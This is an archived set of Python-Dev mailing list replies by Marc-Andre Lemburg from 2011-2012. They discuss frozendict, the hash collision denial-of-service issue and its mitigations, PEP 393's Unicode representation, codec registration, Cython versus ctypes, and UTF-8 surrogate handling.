 As a footnote, distutils is already broken in 3.3.  Now we give users or
 system administrators the possibility to edit the install schemes at
 will in sysconfig.cfg, but distutils hard-codes the old scheme.  I tend
 to think it should be fixed, to make the distutils-packaging
 transition/cohabitation possible.
 
 Any comment?
 
 Thanks,
 Van
 
 CIRCULAR 230 NOTICE: To ensure compliance with requirements imposed by 
 U.S. Treasury Regulations, Haynes and Boone, LLP informs you that any 
 U.S. tax advice contained in this communication (including any 
 attachments) was not intended or written to be used, and cannot be 
 used, for the purpose of (i) avoiding penalties under the Internal 
 Revenue Code or (ii) promoting, marketing or recommending to another 
 party any transaction or matter addressed herein.
 
 CONFIDENTIALITY NOTICE: This electronic mail transmission is confidential, 
 may be privileged and should be read or retained only by the intended 
 recipient. If you have received this transmission in error, please 
 immediately notify the sender and delete it from your system.
 

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Mar 

Re: [Python-Dev] Add a frozendict builtin type

2012-02-28 Thread M.-A. Lemburg
Victor Stinner wrote:
 See also the PEP 351.
 
 I read the PEP and the email explaining why it was rejected.
 
 Just to be clear: the PEP 351 tries to freeze an object, try to
 convert a mutable or immutable object to an immutable object. Whereas
 my frozendict proposition doesn't convert anything: it just raises a
 TypeError if you use a mutable key or value.
 
 For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create
 frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError.

I fail to see the use case you're trying to address with this
kind of frozendict().

The purpose of frozenset() is to be able to use a set as dictionary
key (and to some extent allow for optimizations and safe
iteration). Your implementation can be used as dictionary key as well,
but why would you want to do that in the first place ?

If you're thinking about disallowing changes to the dictionary
structure, e.g. in order to safely iterate over its keys or items,
freezing the keys is enough.

Requiring the value objects not to change is too much of a restriction
to make the type useful in practice, IMHO.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 28 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-02-13: Released eGenix pyOpenSSL 0.13http://egenix.com/go26
2012-02-09: Released mxODBC.Zope.DA 2.0.2 http://egenix.com/go25
2012-02-06: Released eGenix mx Base 3.2.3 http://egenix.com/go24

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Add a frozendict builtin type

2012-02-28 Thread M.-A. Lemburg
Steven D'Aprano wrote:
 M.-A. Lemburg wrote:
 Victor Stinner wrote:
 See also the PEP 351.
 I read the PEP and the email explaining why it was rejected.

 Just to be clear: the PEP 351 tries to freeze an object, try to
 convert a mutable or immutable object to an immutable object. Whereas
 my frozendict proposition doesn't convert anything: it just raises a
 TypeError if you use a mutable key or value.

 For example, frozendict({'list': ['a', 'b', 'c']}) doesn't create
 frozendict({'list': ('a', 'b', 'c')}) but raises a TypeError.

 I fail to see the use case you're trying to address with this
 kind of frozendict().

 The purpose of frozenset() is to be able to use a set as dictionary
 key (and to some extent allow for optimizations and safe
 iteration). Your implementation can be used as dictionary key as well,
 but why would you want to do that in the first place ?
 
 Because you have a mapping, and want to use a dict for speedy, convenient 
 lookups. Sometimes your
 mapping involves the key being a string, or an int, or a tuple, or a set, and 
 Python makes it easy
 to use that in a dict. Sometimes the key is itself a mapping, and Python 
 makes it very difficult.
 
 Just google on python frozendict or python immutabledict and you will 
 find that this keeps
 coming up time and time again, e.g.:
 
 http://www.cs.toronto.edu/~tijmen/programming/immutableDictionaries.html
 http://code.activestate.com/recipes/498072-implementing-an-immutable-dictionary/
 http://code.activestate.com/recipes/414283-frozen-dictionaries/
 http://bob.pythonmac.org/archives/2005/03/04/frozendict/
 http://python.6.n6.nabble.com/frozendict-td4377791.html
 http://www.velocityreviews.com/forums/t648910-does-python3-offer-a-frozendict.html
 http://stackoverflow.com/questions/2703599/what-would-be-a-frozen-dict

Only the first of those links appears to actually discuss reasons for
adding a frozendict, but it fails to provide real world use cases and
only gives theoretical reasons for why this would be nice to have.

From a practical view, a frozendict would allow thread-safe iteration
over a dict and enable more optimizations (e.g. using an optimized
lookup function, optimized hash parameters, etc.) to make lookup
in static tables more efficient.

OTOH, using a frozendict as key in some other dictionary is, well,
not a very realistic use case - programmers should think twice before
using such a design :-)

 If you're thinking about disallowing changes to the dictionary
 structure, e.g. in order to safely iterate over its keys or items,
 freezing the keys is enough.

 Requiring the value objects not to change is too much of a restriction
 to make the type useful in practice, IMHO.
 
 It's no more of a limitation than the limitation that strings can't change.
 
 Frozendicts must freeze the value as well as the key. Consider the toy 
 example, mapping food
 combinations to calories:
 
 
 d = { {appetizer = fried fish, main = double burger, drink = cola}: 5000,
   {appetizer = None,   main = green salad,   drink = tea}:  200,
 }
 
 (syntax is only for illustration purposes)
 
 Clearly the hash has to take the keys and values into account, which means 
 that both the keys and
 values have to be frozen.
 
 (Values may be mutable objects, but then the frozendict can't be hashed -- 
 just like tuples can't be
 hashed if any item in them is mutable.)

Right, but that doesn't mean you have to require that values are hashable.

A frozendict could (and probably should) use the same logic as tuples:
if the values are hashable, the frozendict is hashable, otherwise not.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 28 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-02-13: Released eGenix pyOpenSSL 0.13http://egenix.com/go26
2012-02-09: Released mxODBC.Zope.DA 2.0.2 http://egenix.com/go25
2012-02-06: Released eGenix mx Base 3.2.3 http://egenix.com/go24

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] accept string in a2b and base64?

2012-02-21 Thread M.-A. Lemburg
Nick Coghlan wrote:
 The reason Python 2's implicit str-unicode conversions are so
 problematic isn't just because they're implicit: it's because they
 effectively assume *latin-1* as the encoding on the 8-bit str side.

The implicit conversion in Python2 only works with ASCII content,
pretty much like what you describe here.

Note that e.g. UTF-16 is not an ASCII super set, but the ASCII
assumption still works:

 u'abc'.encode('utf-16-le').decode('ascii')
u'a\x00b\x00c\x00'

Apart from that nit (which can be resolved in most cases by
disallowing 0 bytes), I still believe that the Python2 implicit
conversion between Unicode and 8-bit strings is a very useful
feature in practice.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 21 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2012-02-13: Released eGenix pyOpenSSL 0.13http://egenix.com/go26
2012-02-09: Released mxODBC.Zope.DA 2.0.2 http://egenix.com/go25
2012-02-06: Released eGenix mx Base 3.2.3 http://egenix.com/go24

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP: New timestamp formats

2012-02-02 Thread M.-A. Lemburg
Nick Coghlan wrote:
 On Thu, Feb 2, 2012 at 10:16 PM, Victor Stinner
 Add an argument to change the result type
 -

 There should also be a description of the set a boolean flag to
 request high precision output approach.

 You mean something like: time.time(hires=True)? Or time.time(decimal=True)?
 
 Yeah, I was thinking hires as the short form of high resolution,
 but it's a little confusing since it also parses as the word hires
 (i.e. hire+s). hi_res, hi_prec (for high precision) or
 full_prec (for full precision) might be better.

Isn't the above (having the return type depend on an argument
setting) something we generally try to avoid ?

I think it's better to settle on one type for high-res timers and
add a new API(s) for it.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 02 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Counting collisions for the win

2012-01-23 Thread M.-A. Lemburg
Frank Sievertsen wrote:
 Hello,
 
 I'd still prefer to see a randomized hash()-function (at least for 3.3).
 
 But to protect against the attacks it would be sufficient to use
 randomization for collision resolution in dicts (and sets).
 
 What if we use a second (randomized) hash-function in case there
 are many collisions in ONE lookup. This hash-function is used only
 for collision resolution and is not cached.

This sounds a lot like what I'm referring to as universal hash function
in the discussion on the ticket:

http://bugs.python.org/issue13703#msg150724
http://bugs.python.org/issue13703#msg150795
http://bugs.python.org/issue13703#msg151813

However, I don't like the term random in there. It's better to make
the approach deterministic to avoid issues with not being able
to easily reproduce Python application runs for debugging purposes.

If you find that the data is manipulated, simply incrementing the
universal hash parameter and rehashing the dict with that parameter
should be enough to solve the issue (if not, which is highly unlikely,
the dict will simply reapply the fix). No randomness needed.

BTW: I attached a demo script to the ticket which demonstrates both
types of collisions using integers.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Jan 23 2012)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Hash collision security issue (now public)

2011-12-29 Thread M.-A. Lemburg
Mark Shannon wrote:
 Michael Foord wrote:
 Hello all,

 A paper (well, presentation) has been published highlighting security 
 problems with the hashing
 algorithm (exploiting collisions) in many programming languages Python 
 included:

 
 http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf


 Although it's a security issue I'm posting it here because it is now public 
 and seems important.

 The issue they report can cause (for example) handling an http post to 
 consume horrible amounts of
 cpu. For Python the figures they quoted:

 reasonable-sized attack strings only for 32 bits Plone has max. POST 
 size of 1 MB
 7 minutes of CPU usage for a 1 MB request
 ~20 kbits/s → keep one Core Duo core busy

 This was apparently reported to the security list, but hasn't been responded 
 to beyond an
 acknowledgement on November 24th (the original report didn't make it onto 
 the security list
 because it was held in a moderation queue).
 The same vulnerability was reported against various languages and web 
 frameworks, and is already
 fixed in some of them.

 Their recommended fix is to randomize the hash function.

 
 The attack relies on being able to predict the hash value for a given string. 
 Randomising the string
 hash function is quite straightforward.
 There is no need to change the dictionary code.
 
 A possible (*untested*) patch is attached. I'll leave it for those more 
 familiar with
 unicodeobject.c to do properly.

The paper mentions that several web frameworks work around this by
limiting the number of parameters per GET/POST/HEAD request.

This sounds like a better alternative than randomizing the hash
function of strings.

Uncontrollable randomization has issues when you work with
multi-process setups, since the processes would each use different
hash values for identical strings. Putting the base_hash value
under application control could be done to solve this problem,
making sure that all processes use the same random base value.

BTW: Since your randomization trick uses the current time, it would
also be rather easy to tune an attack to find the currently
used base_hash. To make this safe, you'd have to use a more
random source for initializing the base_hash.

Note that the same hash collision attack can be used for
other key types as well, e.g. integers (where it's very easy
to find hash collisions), so this kind of randomization
would have to be applied to other basic types too.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Dec 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP 393 close to pronouncement

2011-10-11 Thread M.-A. Lemburg
Victor Stinner wrote:
 Given that I've been working on and maintaining the Python Unicode
 implementation actively or by providing assistance for almost
 12 years now, I've also thought about whether it's still worth
 the effort.
 
 Thanks for your huge work on Unicode, Marc-Andre!

Thanks. I enjoyed working it on it, but priorities are different
now, and new projects are waiting :-)

 My interests have shifted somewhat into other directions and
 I feel that helping Python reach world domination in other ways
 makes me happier than fighting over Unicode standards, implementations,
 special cases that aren't special enough, and all those other
 nitty-gritty details that cause long discussions :-)
 
 Someone said that we still need to define what a character is! By the way, 
 what 
 is a code point?

I'll leave that as exercise for the interested reader to find out :-)

(Hint: Google should find enough hits where I've explained those things
on various mailing lists and in talks I gave.)

 So I feel that the PEP 393 change is a good time to draw a line
 and leave Unicode maintenance to Ezio, Victor, Martin, and
 all the others that have helped over the years. I know it's
 in good hands.
 
 I don't understand why you would like to stop contribution to Unicode, but 

I only have limited time available for these things and am
nowadays more interested in getting others to recognize just
how great Python is, than actually sitting down and writing
patches for it.

Unicode was my baby for quite a few years, but I now have two
kids which need more love and attention :-)

 well, as you want. We will try to continue your work.

Thanks.

Cheers,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Oct 11 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP 393 close to pronouncement

2011-09-28 Thread M.-A. Lemburg
Guido van Rossum wrote:
 Given the feedback so far, I am happy to pronounce PEP 393 as
 accepted. Martin, congratulations! Go ahead and mark ity as Accepted.
 (But please do fix up the small nits that Victor reported in his
 earlier message.)

I've been working on feedback for the last few days, but I guess it's
too late. Here goes anyway...

I've only read the PEP and not followed the discussion due to lack of
time, so if any of this is no longer valid, that's probably because
the PEP wasn't updated :-)

Resizing


Codecs use resizing a lot. Given that PyCompactUnicodeObject
does not support resizing, most decoders will have to use
PyUnicodeObject and thus not benefit from the memory footprint
advantages of e.g. PyASCIIObject.


Data structure
--

The data structure description in the PEP appears to be wrong:

PyASCIIObject has a wchar_t *wstr pointer - I guess this should
be a char *str pointer, otherwise, where's the memory footprint
advantage (esp. on Linux where sizeof(wchar_t) == 4) ?

I also don't see a reason to limit the UCS1 storage version
to ASCII. Accordingly, the object should be called PyLatin1Object
or PyUCS1Object.

Here's the version from the PEP:


typedef struct {
  PyObject_HEAD
  Py_ssize_t length;
  Py_hash_t hash;
  struct {
  unsigned int interned:2;
  unsigned int kind:2;
  unsigned int compact:1;
  unsigned int ascii:1;
  unsigned int ready:1;
  } state;
  wchar_t *wstr;
} PyASCIIObject;

typedef struct {
  PyASCIIObject _base;
  Py_ssize_t utf8_length;
  char *utf8;
  Py_ssize_t wstr_length;
} PyCompactUnicodeObject;


Typedef'ing Py_UNICODE to wchar_t and using wchar_t in existing
code will cause problems on some systems where whcar_t is a
signed type.

Python assumes that Py_UNICODE is unsigned and thus doesn't
check for negative values or takes these into account when
doing range checks or code point arithmetic.

On such platform where wchar_t is signed, it is safer to
typedef Py_UNICODE to unsigned wchar_t.

Accordingly and to prevent further breakage, Py_UNICODE
should not be deprecated and used instead of wchar_t
throughout the code.


Length information
--

Py_UNICODE access to the objects assumes that len(obj) ==
length of the Py_UNICODE buffer. The PEP suggests that length
should not take surrogates into account on UCS2 platforms
such as Windows. The causes len(obj) to not match len(wstr).

As a result, Py_UNICODE access to the Unicode objects breaks
when surrogate code points are present in the Unicode object
on UCS2 platforms.

The PEP also does not explain how lone surrogates will be
handled with respect to the length information.

Furthermore, determining len(obj) will require a loop over
the data, checking for surrogate code points. A simple memcpy()
is no longer enough.

I suggest to drop the idea of having len(obj) not count
wstr surrogate code points to maintain backwards compatibility
and allow for working with lone surrogates.

Note that the whole surrogate debate does not have much to
do with this PEP, since it's mainly about memory footprint
savings. I'd also urge to do a reality check with respect
to surrogates and non-BMP code points: in practice you only
very rarely see any non-BMP code points in your data. Making
all Python users pay for the needs of a tiny fraction is
not really fair. Remember: practicality beats purity.


API
---

Victor already described the needed changes.


Performance
---

The PEP only lists a few low-level benchmarks as basis for the
performance decrease. I'm missing some more adequate real-life
tests, e.g. using an application framework such as Django
(to the extent this is possible with Python3) or a server
like the Radicale calendar server (which is available for Python3).

I'd also like to see a performance comparison which specifically
uses the existing Unicode APIs to create and work with Unicode
objects. Most extensions will use this way of working with the
Unicode API, either because they want to support Python 2 and 3,
or because the effort it takes to port to the new APIs is
too high. The PEP makes some statements that this is slower,
but doesn't quantify those statements.


Memory savings
--

The table only lists string sizes up 8 code points. The memory
savings for these are really only significant for ASCII
strings on 64-bit platforms, if you use the default UCS2
Python build as basis.

For larger strings, I expect the savings to be more significant.
OTOH, a single non-BMP code point in such a string would cause
the savings to drop significantly again.


Complexity
--

In order to benefit from the new API, any code that has to
deal with low-level Py_UNICODE access to the Unicode objects
will have to be adapted.

For best performance, each algorithm will have to be implemented
for all three storage types.

Not doing so, will result in a slow-down, if I read the PEP
correctly. It's difficult to say, of what scale, since that
information 

Re: [Python-Dev] Not able to do unregister a code

2011-09-15 Thread M.-A. Lemburg
Jai Sharma wrote:
 Hi,
 
 I am facing a memory leaking issue with codecs. I make my own ABC class and
 register it with codes.
 
 import codecs
 codecs.register(ABC)
 
 but I am not able to remove ABC from memory. Is there any alternative to do
 that.

The ABC codec search function gets added to the codec registry search
path list which currently cannot be accessed directly.

There is no API to unregister a codec search function, since deregistration
would break the codec cache used by the registry to speedup codec
lookup.

Why would you want to unregister a codec search function ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Sep 15 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-10-04: PyCon DE 2011, Leipzig, Germany19 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] Ctypes and the stdlib (was Re: LZMA compression support in 3.3)

2011-08-29 Thread M.-A. Lemburg
Guido van Rossum wrote:
 On Sun, Aug 28, 2011 at 11:23 AM, Stefan Behnel stefan...@behnel.de wrote:
 Hi,

 sorry for hooking in here with my usual Cython bias and promotion. When the
 question comes up what a good FFI for Python should look like, it's an
 obvious reaction from my part to throw Cython into the game.

 Terry Reedy, 28.08.2011 06:58:

 Dan, I once had the more or less the same opinion/question as you with
 regard to ctypes, but I now see at least 3 problems.

 1) It seems hard to write it correctly. There are currently 47 open ctypes
 issues, with 9 being feature requests, leaving 38 behavior-related issues.
 Tom Heller has not been able to work on it since the beginning of 2010 and
 has formally withdrawn as maintainer. No one else that I know of has taken
 his place.

 Cython has an active set of developers and a rather large and growing user
 base.

 It certainly has lots of open issues in its bug tracker, but most of them
 are there because we *know* where the development needs to go, not so much
 because we don't know how to get there. After all, the semantics of Python
 and C/C++, between which Cython sits, are pretty much established.

 Cython compiles to C code for CPython, (hopefully soon [1]) to Python+ctypes
 for PyPy and (mostly [2]) C++/CLI code for IronPython, which boils down to
 the same build time and runtime kind of dependencies that the supported
 Python runtimes have anyway. It does not add dependencies on any external
 libraries by itself, such as the libffi in CPython's ctypes implementation.

 For the CPython backend, the generated code is very portable and is
 self-contained when compiled against the CPython runtime (plus, obviously,
 libraries that the user code explicitly uses). It generates efficient code
 for all existing CPython versions starting with Python 2.4, with several
 optimisations also for recent CPython versions (including the upcoming 3.3).


 2) It is not trivial to use it correctly.

 Cython is basically Python, so Python developers with some C or C++
 knowledge tend to get along with it quickly.

 I can't say yet how easy it is (or will be) to write code that is portable
 across independent Python implementations, but given that that field is
 still young, there's certainly a lot that can be done to aid this.
 
 Cythin does sound attractive for cross-Python-implementation use. This
 is exciting.
 
 I think it needs a SWIG-like
 companion script that can write at least first-pass ctypes code from the .h
 header files. Or maybe it could/should use header info at runtime (with the
 .h bundled with a module).

 From my experience, this is a nice to have more than a requirement. It has
 been requested for Cython a couple of times, especially by new users, and
 there are a couple of scripts out there that do this to some extent. But the
 usual problem is that Cython users (and, similarly, ctypes users) do not
 want a 1:1 mapping of a library API to a Python API (there's SWIG for that),
 and you can't easily get more than a trivial mapping out of a script. But,
 yes, a one-shot generator for the necessary declarations would at least help
 in cases where the API to be wrapped is somewhat large.
 
 Hm, the main use that was proposed here for ctypes is to wrap existing
 libraries (not to create nicer APIs, that can be done in pure Python
 on top of this). In general, an existing library cannot be called
 without access to its .h files -- there are probably struct and
 constant definitions, platform-specific #ifdefs and #defines, and
 other things in there that affect the linker-level calling conventions
 for the functions in the library. (Just like Python's own .h files --
 e.g. the extensive renaming of the Unicode APIs depending on
 narrow/wide build) How does Cython deal with these? I wonder if for
 this particular purpose SWIG isn't the better match. (If SWIG weren't
 universally hated, even by its original author. :-)

SIP is an alternative to SWIG:

 http://www.riverbankcomputing.com/software/sip/intro
 http://pypi.python.org/pypi/SIP

and there are a few others as well:

 http://wiki.python.org/moin/IntegratingPythonWithOtherLanguages

 3) It seems to be slower than compiled C extension wrappers. That, at
 least, was the discovery of someone who re-wrote pygame using ctypes. (The
 hope was that using ctypes would aid porting to 3.x, but the time penalty
 was apparently too much for time-critical code.)

 Cython code can be as fast as C code, and in some cases, especially when
 developer time is limited, even faster than hand written C extensions. It
 allows for a straight forward optimisation path from regular Python code
 down to the speed of C, and trivial interaction with C code itself, if the
 need arises.

 Stefan


 [1] The PyPy port of Cython is currently being written as a GSoC project.

 [2] The IronPython port of Cython was written to facility a NumPy port to
 the .NET environment. It's currently not a complete port of all Cython

Re: [Python-Dev] PEP 393 review

2011-08-29 Thread M.-A. Lemburg
Martin v. Löwis wrote:
 tl;dr: PEP-393 reduces the memory usage for strings of a very small
 Django app from 7.4MB to 4.4MB, all other objects taking about 1.9MB.
 
 Am 26.08.2011 16:55, schrieb Guido van Rossum:
 It would be nice if someone wrote a test to roughly verify these
 numbers, e.v. by allocating lots of strings of a certain size and
 measuring the process size before and after (being careful to adjust
 for the list or other data structure required to keep those objects
 alive).
 
 I have now written a Django application to measure the effect of PEP
 393, using the debug mode (to find all strings), and sys.getsizeof:
 
 https://bitbucket.org/t0rsten/pep-393/src/ad02e1b4cad9/pep393utils/djmemprof/count/views.py
 
 The results for 3.3 and pep-393 are attached.
 
 The Django app is small in every respect: trivial ORM, very few
 objects (just for the sake of exercising the ORM at all),
 no templating, short strings. The memory snapshot is taken in
 the middle of a request.
 
 The tests were run on a 64-bit Linux system with 32-bit Py_UNICODE.

For comparison, could you run the test of the unmodified
Python 3.3 on a 16-bit Py_UNICODE version as well ?

Thanks,
-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Aug 29 2011)
 Python/Zope Consulting and Support ...http://www.egenix.com/
 mxODBC.Zope.Database.Adapter ... http://zope.egenix.com/
 mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/

2011-10-04: PyCon DE 2011, Leipzig, Germany36 days to go

::: Try our new mxODBC.Connect Python Database Interface for free ! 


   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
Python-Dev@python.org
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com


Re: [Python-Dev] PEP 393 Summer of Code Project

2011-08-26 Thread M.-A. Lemburg
Stefan Behnel wrote:
 Isaac Morland, 26.08.2011 04:28:
 On Thu, 25 Aug 2011, Guido van Rossum wrote:
 I'm not sure what should happen with UTF-8 when it (in flagrant
 violation of the standard, I presume) contains two separately-encoded
 surrogates forming a valid surrogate pair; probably whatever the UTF-8
 codec does on a wide build today should be good enough. Similarly for
 encoding to UTF-8 on a wide build if one managed to create a string
 containing a surrogate pair. Basically, I'm for a
 garbage-in-garbage-out approach (with separate library functions to
 detect garbage if the app is worried about it).

 If it's called UTF-8, there is no decision to be taken as to decoder
 behaviour - any byte sequence not permitted by the Unicode standard must
 result in an error (although, of course, *how* the error is to be
 reported
 could legitimately be the subject of endless discussion). There are
 security implications to violating the standard so this isn't just
 legalistic purity.

 Hmmm, doesn't look good:

 Python 2.6.1 (r261:67515, Jun 24 2010, 21:47:49)
 [GCC 4.2.1 (Apple Inc. build 5646)] on darwin
 Type help, copyright, credits or license for more information.
  '\xed\xb0\x80'.decode ('utf-8')
 u'\udc00'
 

 Incorrect! Although this is a narrow build - I can't say what the wide
 build would do.
 
 Works the same for me in a wide Py2.7 build, but gives me this in Py3:
 
 Python 3.1.2 (r312:79147, Sep 27 2010, 09:57:50)
 [GCC 4.4.3] on linux2
 Type help, copyright, credits or license for more information.
 b'\xed\xb0\x80'.decode ('utf-8')
 Traceback (most recent call last):
   File stdin, line 1, in module
 UnicodeDecodeError: 'utf8' codec can't decode bytes in position 0-2:
 illegal encoding
 
 Same for current Py3.3 and the PEP393 build (although both have a better
 exception message now: UnicodeDecodeError: 'utf8' codec can't decode
 bytes in position 0-1: invalid continuation byte).

The reason for this is that the UTF-8 codec in Python 2.x
has never rejected lone surrogates and it was used to
store Unicode literals in pyc files (using marshal)
and also by pickle for transferring Unicode strings,
so we could simply reject lone surrogates, since this
would have caused compatibility problems.

That change was made in Python 3.x by having a special
error handler surrogatepass which allows the UTF-8
codec to process lone surrogates as well.

BTW: I'd love to join the discussion about PEP 393, but
unfortunately I'm swamped with work, so these are just
a few comments...

What I'm missing in the discussion is statistics of the
effects of the patch (both memory and performance) and
the effect on 3rd party extensions.

I'm not convinced that the memory/speed tradeoff is worth the
breakage or whether the patch actually saves memory in real world
applications and I'm unsure whether the needed code changes to
the binary Python Unicode API can be done in a minor Python
release.

Note that in the worst case, a PEP 393 Unicode object will
save three versions of the same string, e.g. on Windows
with sizeof(wchar_t)==2: A UCS4 version in str,
a UTF-8 version in utf8 (this gets build whenever Python needs
a UTF-8 version of the Object) and a wchar_t version in wstr
(which gets build whenever Python codecs or extensions need
Py_UNICODE or a wchar_t representation).
On all platforms, in the case where you store a Latin-1
non-ASCII string: str holds the Latin-1 string, utf8 the
UTF-8 version and wstr the 2- or 4-bytes wchar_t version.


* A note on terminology: Python stores Unicode as code points.

A Unicode code point refers to any value in the Unicode code
range which is 0 - 0x10. Lone surrogates, unassigned
and illegal code points are all still code points - this is
a detail people often forget. Various code points in Unicode
have special meanings and some are not allowed to be
used in encodings, but that does not make them rule them
out from being stored and processed as code points.

Code units are only used in encoded versions Unicode, e.g.
the UTF-8, -16, -32. Mixing code units and code points
can cause much confusion, so it's better to talk only
about code point when referring to Python Unicode objects,
since you only ever meet code units when looking at the
the bytes output of the codecs.

This is important to know, since Python is not only meant
to process Unicode, but also to build Unicode strings, so
a careful distinction has to be made when considering what
is correct and what not: codecs have to follow much more
strict rules than Python itself.


* A note on surrogates: These are just one particular problem
where you run into the situation where splitting a Unicode
string potentially breaks a combination of code points.
There are a few other types of code points that cause similar
problems, e.g. combining code points.

Simply going with UCS-4 does not solve the problem, since
